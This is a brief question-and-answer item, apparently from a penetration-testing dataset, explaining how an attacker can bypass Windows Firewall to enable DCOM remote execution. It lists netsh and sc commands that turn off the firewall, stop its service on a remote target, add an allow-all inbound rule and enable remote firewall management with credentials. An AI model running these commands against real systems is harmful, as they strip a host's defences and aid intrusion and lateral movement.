How can an attacker bypass the Windows Firewall to enable DCOM remote execution?

Attackers can disable the firewall entirely via `netsh advfirewall set currentprofile state off` or remotely stop the firewall service using `sc \\target stop mpssvc`. Alternatively, they can create inbound rules allowing any port (`netsh advfirewall firewall add rule name="any" protocol=TCP dir=in localport=any action=allow`) or change the firewall profile to allow all inbound connections. Remote firewall modification requires enabling remote management via `netsh advfirewall set currentprofile settings remotemanagement enable` and then using `netsh -r target -u user -p pass ...`. These techniques are often combined with stealthy methods described in Penetration Techniques - Stealth Execution of Windows Remote Assistance.